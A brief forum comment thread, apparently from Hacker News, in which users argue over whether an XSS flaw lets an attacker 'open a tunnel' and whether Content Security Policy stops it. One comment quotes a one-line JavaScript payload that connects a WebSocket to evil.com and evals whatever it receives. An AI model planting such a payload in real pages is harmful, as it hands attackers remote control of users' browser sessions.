> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

▲ rainonmoon 12 hours ago | parent [-]

Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

	▲	llmslave2 11 hours ago \| parent [-]
		Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.